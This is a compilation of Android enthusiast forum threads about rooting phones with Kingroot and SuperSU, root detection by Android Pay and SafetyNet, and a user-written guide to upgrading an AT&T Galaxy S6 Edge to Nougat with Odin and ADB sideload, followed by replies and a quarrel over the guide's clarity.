Have you tried Kingroot?
I successfully rooted my wife's AT&T S4 on OC3 lollipop (supposedly unrootable) with the desktop version. Mobile version didn't work but desktop did without a hiccup. Maybe it'll work on the S5.
http://forum.xda-developers.com/android/apps-games/one-click-root-tool-android-2-x-5-0-t3107461
Rockin' a l337 with Goldeneye v49.1 + Wanam Xposed and loving life on AT&T's 4G LTE network
S5 on lollipop has a new nasty boot loader.... it was a miracle on its own that they ever came up with safestrap to duck the boot loader on earlier versions of android

SuperSU and SafetyNet / Android Pay

This is the place to discuss anything and everything related to SuperSU and SafetyNet / Android Pay.
To clarify, I am not currently actively doing any development on having SuperSU pass SafetyNet detection, or having Android Pay work; the same way I put no effort into beating other root detection methods such as various enterprise security tools.
In case any SuperSU-rooted device passes SafetyNet, that is a bug in SafetyNet, not a feature of SuperSU.
While I may not agree with Google's stance, I'm not about to go messing with payment systems. Is it possible though? Probably yes.
This thread has been created because you guys simply cannot stop talking about this, so these posts can now go here, where I don't ever have to see them.
Will v2.50 cause Android Pay not to work in 6.0? If so, I am guessing there is no way around it?
0.0 said:
Will v2.50 cause Android Pay not to work in 6.0? If so, I am guessing there is no way around it?
Click to expand...
Click to collapse
Root is a no no with android pay and I think custom ROMs are also out at the moment
Sent from my A0001 using Tapatalk
Pure Drive GT said:
Hey, thanks for your continued support for root on Android, was just wondering, is google making it harder to achieve decent root privileges, as in they don't want rooted devices or are they just unrelatedly changing up things which forces you guys to adapt?
On another note, is there any progress on root without the modded boot? This is by no means an ETA, just wanted to know if you think it's possible or the situation looks rather dire.
Thanks again for your many efforts!
Click to expand...
Click to collapse
Well, just look at Android Pay, it will not allow one to add a credit card if it detects the device is rooted. So yeah, Google definitely wants to stop root, or at least make sure there is a strong dissuasion towards same. It's not a bad thing persae, as Google is just making the devices more secure for the masses. We 'power users' are lucky to have those such as Chainfire working so hard to get us what they can.
mdamaged said:
Well, just look at Android Pay, it will not allow one to add a credit card if it detects the device is rooted. So yeah, Google definitely wants to stop root, or at least make sure there is a strong dissuasion towards same. It's not a bad thing persae, as Google is just making the devices more secure for the masses. We 'power users' are lucky to have those such as Chainfire working so hard to get us what they can.
Click to expand...
Click to collapse
Many banking and financial apps restrict access on rooted devices; it's not just Google.
It makes sense in some ways: root access allows running things in the background to either circumvent, monitor, or interrupt program transactions. They're being paranoid, and I don't blame them.
I don't like the Google Pay concept (or Apple's either); like every other encryption or security system, it's destined to eventually be hacked.
mdamaged said:
Well, just look at Android Pay, it will not allow one to add a credit card if it detects the device is rooted. So yeah, Google definitely wants to stop root, or at least make sure there is a strong dissuasion towards same. It's not a bad thing persae, as Google is just making the devices more secure for the masses. We 'power users' are lucky to have those such as Chainfire working so hard to get us what they can.
Click to expand...
Click to collapse
Yep, I was able to add my debit card but not credit.
VZW LG G4
mdamaged said:
Well, just look at Android Pay, it will not allow one to add a credit card if it detects the device is rooted. So yeah, Google definitely wants to stop root, or at least make sure there is a strong dissuasion towards same. It's not a bad thing persae, as Google is just making the devices more secure for the masses. We 'power users' are lucky to have those such as Chainfire working so hard to get us what they can.
Click to expand...
Click to collapse
http://www.androidpolice.com/2015/0...hy-android-pay-doesnt-support-rooted-devices/
shaggyskunk said:
Yet the Note 5 has been rooted for at least a couple of weeks
Click to expand...
Click to collapse
On Lollipop... And you also have to unlock your bootloader to do that, right? If yes, then you will trip the KNOX, and that mean you will loose some of your device functionality (Samsung Pay for example), without option to take it back. On the Nexus on the other hand, when you want to use Android Pay on Nexus, you can restore your phone to completely stock condition, without any trace of previously used root.
Also, all of this is completely irrelevant to carried device users, since they have a locked bootloaders.
Srandista said:
On Lollipop... And you also have to unlock your bootloader to do that, right? If yes, then you will trip the KNOX, and that mean you will loose some of your device functionality (Samsung Pay for example), without option to take it back. On the Nexus on the other hand, when you want to use Android Pay on Nexus, you can restore your phone to completely stock condition, without any trace of previously used root.
Also, all of this is completely irrelevant to carried device users, since they have a locked bootloaders.
Click to expand...
Click to collapse
I believe that it's only at&t and Verizon that locks the bootloader - And none in Canada and many other Countries.
Sent From my SM-N910W8 Running SlimRemix V5.1
Had an interesting event, on 2.52.
I unchecked "Enable Superuser" in Settings, to attempt to use Android Pay (Android Pay still wouldn't work). Then, when I rechecked "Enable Superuser", the re-installation of the binary failed, and I was prompted to reboot to try again. However, then I got a boot loop (never even got the opportunity to enter my encryption code). The only way I was able to boot was to re-flash the modified boot.img and re-install SuperSU from the zip (no idea whether both steps were necessary).
I have a Marshmallow Nexus 6, encrypted. For what it's worth, I was previously rooted on 5.1.1, and, after updating to 6.0 and until I re-rooted, I always got a "Your device is corrupt" message on startup, despite being all stock.
NYZack said:
Had an interesting event, on 2.52.
I unchecked "Enable Superuser" in Settings, to attempt to use Android Pay (Android Pay still wouldn't work). Then, when I rechecked "Enable Superuser", the re-installation of the binary failed, and I was prompted to reboot to try again. However, then I got a boot loop (never even got the opportunity to enter my encryption code). The only way I was able to boot was to re-flash the modified boot.img and re-install SuperSU from the zip (no idea whether both steps were necessary).
I have a Marshmallow Nexus 6, encrypted. For what it's worth, I was previously rooted on 5.1.1, and, after updating to 6.0 and until I re-rooted, I always got a "Your device is corrupt" message on startup, despite being all stock.
Click to expand...
Click to collapse
Root doesn't have to be enabled for pay to fail. Any time the system partition is modified pay will not work. There was an xda news article on it. A quick Google search involving Android pay and root should find it.
Lrs121 said:
Root doesn't have to be enabled for pay to fail. Any time the system partition is modified pay will not work. There was an xda news article on it. A quick Google search involving Android pay and root should find it.
Click to expand...
Click to collapse
I also found that having an unlocked bootloader will stop Pay working. When MM released I decided to go fully back to stock but kept the bootloader unlocked so I could flash MM. Pay still failed, so I've given up and gone rooted again.
Sent from my Nexus 6 using Tapatalk
Ch3vr0n said:
@Chainfire if you actually are able to pull off fully working stable root WITHOUT modifying the /system does that mean you MIGHT have opened the door into having root AND still being able to get OTA's?
Click to expand...
Click to collapse
osm0sis said:
Yup, all you'd need to do is reflash stock kernel to pass the boot partition EMMC check, or, we could automate restoring the previous stock kernel, flashing the OTA and then injecting the new stock kernel with root after flashing (à la AnyKernel2 or MultiROM). So many exciting possibilities there where custom recoveries are concerned.
Click to expand...
Click to collapse
Chainfire said:
Honestly it's not so different from using FlashFire to flash re-flash system, then OTA, then re-root. But it is easier, yes.
Click to expand...
Click to collapse
This is indeed exciting. However, I noticed that @Chainfire posted this downside on Google+ :
Andrew Morykin 12:24
This should retain Android Pay, right?
Click to expand...
Click to collapse
Chainfire 12:58
+Andrew Morykin if it does, then it's by accident and not by design, and Android Pay will be updated to block it.
Click to expand...
Click to collapse
https://plus.google.com/+Chainfire/posts/aJbqUZ8PEP4
also, I was confused by this:
Chainfire said:
- I have not tested with encrypted devices
Click to expand...
Click to collapse
http://forum.xda-developers.com/showpost.php?p=63197935
Aren't
Nexus 6P / angler
angler-mdb08k-boot-systemless.zip
Click to expand...
Click to collapse
and
Nexus 5X / bullhead
bullhead-mdb08i-boot-systemless.zip
Click to expand...
Click to collapse
encrypted out of the box?
dabotsonline said:
This is indeed exciting. However, I noticed that @Chainfire posted this downside on Google+ :
Click to expand...
Click to collapse
How is that a downside?
It's exactly the same with every other form of root you will ever see. They don't want to support Android Pay (and some other stuff) on rooted devices. If we find a root that allows it, they will update their system to detect and block it. That cat and mouse game will not end as long as Google doesn't want Android Pay on rooted devices.
Maybe someone will make apps/modules that help circumvent this, but it certainly will not be me.
also, I was confused by this:
Aren't
Nexus 6P / angler
and
Nexus 5X / bullhead
encrypted out of the box?
Click to expand...
Click to collapse
Still can't test what I don't have.
russlowe73 said:
Factory images
Click to expand...
Click to collapse
So basically I have to go back to 100% stock using ADB, and then flash the new SuperSU stuff with any custom ROM? If so, what are the benefits of this other than getting Android Pay while rooted?
I'm not sure if anyone has specifically mentioned this, but Android Pay still works with this form of root on the Nexus 6!!
efrant said:
Starting with Android 5.0, OTA updates are now block-based rather than file-based, so any modification to the system partition will cause the OTA to fail, even mounting the system partition as r/w.
Click to expand...
Click to collapse
Just to add to this, it's a whole-partition /system patch OTA if the device launched with Lollipop or later, anything that launched with KitKat is still receiving the old file-based patch OTAs. Modifying Settings.apk would likely trip either method for a lot of OTAs though, since it's a pretty central component.
galaxyuserx said:
I use Galaxy s6 G9200 HK with Kernel compiled by me, but i have problem with root 5.1.1 and i think in future too 6.0
These root method is integrated in kernel source or i can integrate with those "boot.img systemless" my selfcompiled kernel?(repack boot.img with kernel compiled by me)
Is possible to work this new root method to android 5.1.1?
I have problem with gain root when i use kernel compiled by me ( STOCK kernel have too this problem BOOTLOOPs and FREEZEs on boot system) and i don't know how slove it :/
I found on chineese forums root integrated in boot.img it working good and isn't comunicat "KERNEL is not SEandroid enforced" but when i try integrate my kernel with this boot.img error with boot system :/
Click to expand...
Click to collapse
Yup, it's all ramdisk changes so should be workable on any version of Android. Chainfire left instructions outlining the ramdisk changes in the WIP thread if you want to give it a try.
phishfi said:
I'm not sure if anyone has specifically mentioned this, but Android Pay still works with this form of on the Nexus 6!!
Click to expand...
Click to collapse
Yup, seems to be the case with most banking and root-detecting apps... for now.
Can someone with the non-system SU use this app: https://play.google.com/store/apps/details?id=com.cigital.safetynetplayground and post the results?
This app is supposed to do the SafetyNet checks cleanly, the same way Android Pay does them.
Would be interesting to see if it succeeds on devices with this new supersu version.
secguy said:
Can someone with the non-system SU use this app: https://play.google.com/store/apps/details?id=com.cigital.safetynetplayground and post the results?
This app is supposed to do the SafetyNet checks cleanly, the same way Android Pay does them.
Would be interesting to see if it succeeds on devices with this new supersu version.
Click to expand...
Click to collapse
Just ran it and it passed.
Went ahead and installed su on a stock nexus 5, so far working well, android pay does not work but that was me being stupid and changing the host file and dpi before setting it up
I do notice a little input lag after this, not enough to even make me consider removing root, but it is noticeable, anybody else with this?

Steps to Upgrade S6 Edge G925A (AT&T version) to Android 7.0 Nougat

I am a newbie and this is the first time I have tried anything out of the way to update my phone. I have an unlocked S6 edge AT&T version which was running MM 6.0.1. I wanted to update it to the latest Android Nougat and in order to do that I started searching online, but there was no such straight post or article where I can get everything in one place. I found a lot of information and many ways to upgrade the firmware but not all the steps were perfectly placed.
Anyways, I referred to many articles and posts and realized that it could be risky but doable so I went ahead and did it successfully. Though I faced few errors and issues but I found most of the resolution here at xda-developers and other online forums. I am writing this post to help all S6 edge owners who want to upgrade to Android 7.0.
My Phone Details:
Model: SM-G925A (S6 Edge AT&T)
Build: G925AUCS5DPJ1
Android: 6.0.1
There are two major steps involved to upgrade to the latest android version.
1. Flash the firmware with the higher security patch (keeping the device at Android 6) using ODIN software.
2. Upgrade the firmware to Android 7 using ADB software.
[Note: I might be using flash, upgrade interchangeably]
Downloads
Tools :
Latest ODIN tool (I used 3.10.6)
ADB tool (I used 25.0.3 but you can find latest version here)
Firmware:
First you need to flash you ROM to reach G925AUCS5DPK5 build. You can download this file from here.
Refer to Post:
https://forum.xda-developers.com/att-galaxy-s6-edge/general/g925a-pk5-stock-repair-ota-7-0-t3564102
Then you have to update the firmware to get Android 7 using this fie SS-G925AUCS5DPK5-to-U5EQA8-UP (put a .zip after this file to make it recognizable by the tool)
Step 01: Flash latest security patch
ODIN Working:
Link 01: http://droidvendor.com/how-to-install-stock-firmware-using-odin-on-a-samsung-device/
Link 02: http://www.droidviews.com/install-android-nougat-on-att-galaxy-s6-s6-edge-sm-g920ag925a/
My recommendations:
1. Use 3.10.6 version.
2. Unpack the G925AUCS5DPK5.zip file and you will find 4 different .tar.md5 files namely AP, BL, CP and CSC.
3. Use all 4 files at once in ODIN. Do not use only AP. If you use only AP file then your phone will be updated to the latest security patch and will work fine but it won't update the baseband version and will still show it as G925AUCS5DPJ1 even though your latest build is G925AUCS5DPK5. This will create problem while going to Android 7.0.
4. Take proper back up of all your files before going ahead using Samsung SmartSwitch.(Download Links : Windows, Mac). This way you can take back up easily as well as your pc will have the latest USB drivers.
5. Make sure your phone baseband and build are same as G925AUCS5DPJ1.
6. Charge you phone at least 70% before going ahead. It is just a precaution in case this process takes longer than expected. (Mine was finished in 4 minutes)
Step 02: Update to Android 7.0
ADB Working:
Link 01: http://www.droidviews.com/download-latest-adb-and-fastboot-sdk-platform-tools-win-mac-linux/
Link 02: http://www.droidviews.com/install-apk-files-using-adb-commands/
My Recommendations:
1. Use the version I have recommended above instead of going to the latest version (I faced some issue with the latest one and had to go back to this version)
2. Instead of opening the command prompt from shift+right click. Use run or search cmd and open it as administrator.
3. Change the SS-G925AUCS5DPK5-to-U5EQA8-UP.zip to OTA.zip or any shorter name. It will be easy to type the command.
4. If you face any error try using adb kill-server and then use adb sideload <ota.zip>.
5. Be patient this process will take some time. Mine took 25 minutes to complete.
6. Again keep your phone battery charged enough to survive the process.
7. After restart my phone stuck at black screen AT&T logo for 5 minutes. So don't get worried just wait, it will work.
8. Read all the instructions twice on the links provided before going ahead. If you are not sure of any instruction you can search xda forum and you will find relevant information.
Problems/Issues I faced
1. Reduced Storage: After updating my phone to build G925AUCS5DPK5, I realized the phone is only showing 16gb storage while my phone internal storage was 64gb. ( I found the root cause when I got my 3rd error, for the storage issue I was not bothered enough but wanted to go ahead so that I can get Nougat soon)
2. ADB Terminated: My phone got this error when I was updating it to Nougat. (The error looked like this : terminate called after throwing an instance of std::logic_error what() ). I searched online I found out that this is happening because of the adb version I am using, so I downloaded another version and it went through without this error but gave me the below one.
3. Status 7 Error: Again in adb I faced this error. And the error looked like this: 'Verifying current system..."/system/csc/contents.db" has unexpected contents. Error Pic Link.
I searched online and found out that this could be related to CSC file which I have not updated in my first step. So this time I again performed my first step using Odin tool but I selected the 3 files except the AP and ran the process. Yippy, I got my storage back and in adb there was no any error going forward.
Conclusion: I got Nougat on my At&T S6 Edge but I faced few issues. Being a new comer it was not much difficult provided you have the information and passion to do it. The steps mentioned here are very specific to S6 Edge but it can be used for other versions as well. You only have to make sure you have the current files and build combination otherwise your phone could be bricked. I hope this post will be helpful for the users.
Thanks for the detailed instruction on how to upgrade. Very useful! I do have one question though. Does Samsung pay work after upgrading using the method stated above?
Thanks for the great step by step guide. The only amendments/extra things that might help a little more:
Step 1) I used ODIN v3.12 as described above. Loaded all 4 files, BL AP CP CSC
***Basic missing step in the guide was to use ODIN correctly, you need to put your phone into upload mode.***
***Basic step, to prepare to use adb you must enable USB debugging while you have the Step 1 complete before you start Step 2***
Step 2) I was getting the errors thrown with ADB terminated and did some research. You have to use v25.0.3 or else it throws the std::logic_error what() error. It was challenging to track down that version of the adb but I found it here: https://www.izzysoft.de/ftp/local/android/
***Basic Step, in order to use adb, you must put your phone in recovery mode*** (and be sure you use v25.0.3)
Thanks again for the great tutorial!
Shame you cannot start out with latest version of Baseband version: G925AUCS6DQC1 that is in the phone and not have to go Back a version first to PK5
techwire said:
1. Use the version I have recommended above instead of going to the latest version (I faced some issue with the latest one and had to go back to this version)
Click to expand...
Click to collapse
i am curious, what specific issues did you have? should i stay on EQA8?
i had success with this method following the instructions and commentary going from DPK5 > EQA8. One additional thing to note is that each step of the process (odin, adb) will wipe the contents of the phone. I backed up with samsung switch, but it doesn't quite capture all the settings so you may want to use something else.
Hi
great post, i followed your instructions and i was able to get from DPK1 ( 6.01) to QA8. Now I noticed that G625AUCU5EQA8 is not the official ROM so would like to get at least to G925AAUCS6DQC1.
Do you know how to get from G625AUCU5EQA8 to G925AAUCS6DQC1?
thank you for your advice.
here is another DPK5 mirror
https://ulozto.net/!PpQ4SbJJOQyD/g925aucs5dpk5-6-0-1-4file-usa-att-7z
G925Aucu4dph5 is my build number, what can I do?
GoRi7o3 said:
G925Aucu4dph5 is my build number, what can I do?
Click to expand...
Click to collapse
You can Odin to Nougat 7.0 from here : http://forum.xda-developers.com/showthread.php?p=72406969
On Edge of Galaxy
You have any tutorial video of this or something that prove this method?
GoRi7o3 said:
You have any tutorial video of this or something that prove this method?
Click to expand...
Click to collapse
What proof do you need?
I don't now much things about this, can I jump to my baseband number g925aucu4dph5 to the baseband you mention in the post, or I have to do this method many times jumping from baseband to baseband to get the one you post
GoRi7o3 said:
I don't now much things about this, can I jump to my baseband number g925aucu4dph5 to the baseband you mention in the post, or I have to do this method many times jumping from baseband to baseband to get the one you post
Click to expand...
Click to collapse
Yes. You can jump from whatever baseband you have to most of full Odin files.
On Edge of Galaxy
Ok thank you, I will use this method soon, I wish that work
I am still rooted with OE2 5.0.1
Is there any way to update my device using ODIN without losing the root? Just curious. Switching to Fi and I unlocked my phone from the carrier, but since its 5.0.1 it wont run the Project Fi app which requires 5.1+ to activate and operate.
Illiteracy and instruction...
I would like to know why it seems like the only threads on how to upgrade a SM-G925A from 5.1.1 to Nougat lack clear language, in an organized fashion, that would allow those most challenged by the process to accomplish the task with the least amount of frustration. I really cannot comprehend how it is that someone considered a "Senior Member" is permitted to instruct on complex procedures, when it is apparent the person does not have a fluency in the language being used. I don't say this as an insult to anyone's culture or ethnicity, it just adds to the difficulty. Where are the moderators (Admins) when you need clarity. There must be someone who can impart the step-by-step procedure concisely. This forum is not useful for its intended purpose otherwise.
Alias_REBaker said:
I would like to know why it seems like the only threads on how to upgrade a SM-G925A from 5.1.1 to Nougat lack clear language, in an organized fashion, that would allow those most challenged by the process to accomplish the task with the least amount of frustration. I really cannot comprehend how it is that someone considered a "Senior Member" is permitted to instruct on complex procedures, when it is apparent the person does not have a fluency in the language being used. I don't say this as an insult to anyone's culture or ethnicity, it just adds to the difficulty. Where are the moderators (Admins) when you need clarity. There must be someone who can impart the step-by-step procedure concisely. This forum is not useful for its intended purpose otherwise.
Click to expand...
Click to collapse
What you talking about? This is very easy process. But there is even easier of you read another threads and learn from XDA or YouTube how to use ODIN. When you ready to try Odin you can flash firmware from here : http://forum.xda-developers.com/showthread.php?t=3611271 . This is 100% stock AT&T Nougat 7.0 Odin firmware use by Best Buys or Smasung to restore phones.
BTW Senior Members are mostly who build this forum. So just follow instructions, sit back and enjoy. If you need more clarification use your best friend Google or YouTube.
On Edge of Galaxy
Clarity wins
First of all, not admitting your English grammar is in need of some fine tuning doesn't help to clarify the issue. Additionally, combining both ADB sideloading and Odin, without clearly delineating which zip files need to be acquired for accomplishing the task using one or the other method, just adds to the confusion. I upgraded my phone using Odin and the "OCF" "tar" files. But, I was getting confused as to whether I also needed to use ADB to get to "OCF". I started off at "BOJ9". Not wanting to brick my phone led to much trepidation. I wanted to be absolutely sure. The main question I needed clarified was whether I could go from "BOJ9" to "OCF" without needing to go through each iteration. Many people had asked this question, but no specific answer was ever given. Thus, my frustration. I did eventually figure it out, but coming to XDA looking for a clear answer was not the solution. I see a lot of posturing, responders getting snarky telling the confused it's in some thread yet to be dug into or just being rude. Just help. Really, if that's not why you're here, move on.
Alias_REBaker said:
First of all, not admitting your English grammar is in need of some fine tuning doesn't help to clarify the issue. Additionally, combining both ADB sideloading and Odin, without clearly delineating which zip files need to be acquired for accomplishing the task using one or the other method, just adds to the confusion. I upgraded my phone using Odin and the "OCF" "tar" files. But, I was getting confused as to whether I also needed to use ADB to get to "OCF". I started off at "BOJ9". Not wanting to brick my phone led to much trepidation. I wanted to be absolutely sure. The main question I needed clarified was whether I could go from "BOJ9" to "OCF" without needing to go through each iteration. Many people had asked this question, but no specific answer was ever given. Thus, my frustration. I did eventually figure it out, but coming to XDA looking for a clear answer was not the solution. I see a lot of posturing, responders getting snarky telling the confused it's in some thread yet to be dug into or just being rude. Just help. Really, if that's not why you're here, move on.
Click to expand...
Click to collapse
First of all English is my sixth language I know 5 more, how much more you know, second this is international forum open for whole world, third I'm almost 55 years old and understand all process ( this telling me one or two things about you) . You must be millennial who thinks he is most important person on world. If you don't like it move on to different place.
And yes you can go strait by ODIN from your build to QCF with out any problem, but seems like you not read enough.
O! One more you must be Polish because only this people critique other people's language ability, I know because I was like this once.
Edit: Also I see inability to follow instruction or search. You need to have everything put for you on silver platter.
On Edge of Galaxy
Attitude instead of resolution.
So, here it starts, attitude. I'm 56 and will shortly be 57. I am no millennial. Secondly, perhaps you should focus on your English grammar skills. While you may speak several languages, your skill with written English is atrocious. Even if your English grammar was passable, you have no skill at writing an organized and cohesive text. A simple, step-by-step guide to accomplish the task. Putting up a few links mixed with gibberish is not helpful. It's lazy and sloppy. Have some pride in your work. Exhibit some maturity and avoid superfluous writing.

Categories

Resources